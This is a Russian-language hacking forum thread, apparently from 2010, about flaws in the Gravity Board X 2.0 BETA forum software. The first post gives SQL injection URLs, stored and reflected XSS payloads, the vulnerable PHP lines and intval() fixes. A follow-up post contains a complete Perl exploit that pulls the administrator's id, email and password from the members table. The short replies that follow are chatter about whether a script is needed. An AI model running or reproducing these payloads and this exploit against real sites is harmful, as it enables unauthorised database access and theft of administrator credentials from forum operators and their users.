Gravity Board X 2.0 BETA (Public Release 3)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Gravity Board X 2.0 BETA (Public Release 3) - 2010-02-26 05:42:27.393333
|
|
|
Ctacok
Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
|
Название: Gravity Board X Офф. сайт: http://www.gravityboardx.com Версия: 2.0 BETA (Public Release 3) SQL Иньекция. quote:
/index.php?action=viewprofile&member_id=-2'+union+select+concat_ws(0x3a,user(),database(),version())+–+ $miquery = mysql_query("SELECT * FROM " . $prefix . "members WHERE memberid = '{$_GET['member_id']}'") OR DIE("Gravity Board X was unable get the member data requested from the members database: " . mysql_error()); Решение:
$member_id = intval($_GET['member_id']);
$miquery = mysql_query("SELECT * FROM " . $prefix . "members WHERE memberid = '$member_id'") OR DIE("Gravity Board X was unable get the member data requested from the members database: " . mysql_error());
quote:
index.php?action=viewpm&imid=-1'+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8,9,10+–+ $imquery = mysql_query("SELECT * FROM " . $prefix . "ims WHERE imid='{$_GET['imid']}' AND imto='{$_SESSION['memberid']}'", $connection) OR DIE("Gravity Board X was unable to retrieve your personal message from the database: " . mysql_error()); Решение: $imid = intval($_GET['imid'])
$imquery = mysql_query("SELECT * FROM " . $prefix . "ims WHERE imid='$imid' AND imto='{$_SESSION['memberid']}'", $connection) OR DIE("Gravity Board X was unable to retrieve your personal message from the database: " . mysql_error()); quote:
/index.php?action=viewboard&board_id=-2'+union+select+1,concat_ws(0x3a,user(),database(),version()),3+–+ Активная XSS. /index.php?action=newpm В поле Message(Сообщение). quote:
<script>alert();</script> /index.php?action=postnew&board_id=[Номер категории] Имя: Bla Message: quote:
<script>alert();</script> Пассивная XSS quote:
/index.php?action=viewthread&thread_id="><script>alert()</script> Источник
|
|
|
RE: Gravity Board X 2.0 BETA (Public Release 3) - 2010-02-26 13:26:03.986666
|
|
|
Ctacok
Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
|
Опубликовал сплойт Gravity Board X 2.0 BETA (Public Release 3) SQL INJECTION EXPLOIT.
#!/usr/bin/perl
use LWP::Simple;
print "\n";
print "##############################################################\n";
print "# Gravity Board X 2.0 BETA (Public Release 3) SQL INJECTION #\n";
print "# Author: Ctacok (Russian) #\n";
print "# Blog : www.Ctacok.ru #\n";
print "# Special for Antichat (forum.antichat.ru) and xakep.ru #\n";
print "# Big Thanks to Slip :) #\n";
print "# Require : Magic_quotes = Off #\n";
print "##############################################################\n";
if (@ARGV < 2)
{
print "\n Usage: exploit.pl [host] [path] ";
print "\n EX : exploit.pl www.localhost.com /path/ prefix \n\n";
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];
$prefix=$ARGV[2]; # PREFIX TABLES, Default: gbx
$vuln = "-2'+union+select+concat(0x3a3a3a,memberid,0x3a,email,0x3a,pw,0x3a3a3a)+from+".$prefix."_members";
$doc = get($host.$path."index.php?action=viewprofile&member_id=".$vuln."+--+");
if ($doc =~ /:::(.+):(.+):(.+):::/){
print "\n[+] Admin id: : $1";
print "\n[+] Admin email: $2";
print "\n[+] Admin password: $3";
}
|
|
|
RE: Gravity Board X 2.0 BETA (Public Release 3) - 2010-04-29 09:23:13.016666
|
|
|
scj53banking
Сообщений: 255
Оценки: 0
Присоединился: 2010-03-14 21:43:29.030000
|
спс
|
|
|
RE: Gravity Board X 2.0 BETA (Public Release 3) - 2010-04-29 18:27:47.136666
|
|
|
FriLL
Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
|
Тс, а в чем смысл эксплойта, не легче ли просто все через адрессную строку провести?
|
|
|
RE: Gravity Board X 2.0 BETA (Public Release 3) - 2010-04-29 22:46:26.650000
|
|
|
FriLL
Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
|
quote:
ORIGINAL: =Carder= Как говорится любые старания должны потдерживатся ;) Изобретаем велосипед?
|
|
|
RE: Gravity Board X 2.0 BETA (Public Release 3) - 2010-05-02 00:39:08.490000
|
|
|
.::[КОСТЕТ]::.
Сообщений: 1022
Оценки: 0
Присоединился: 2009-02-09 18:35:50.353333
|
Тоже вариант, но более долгий/возможно сложный.
|
|
|
|
|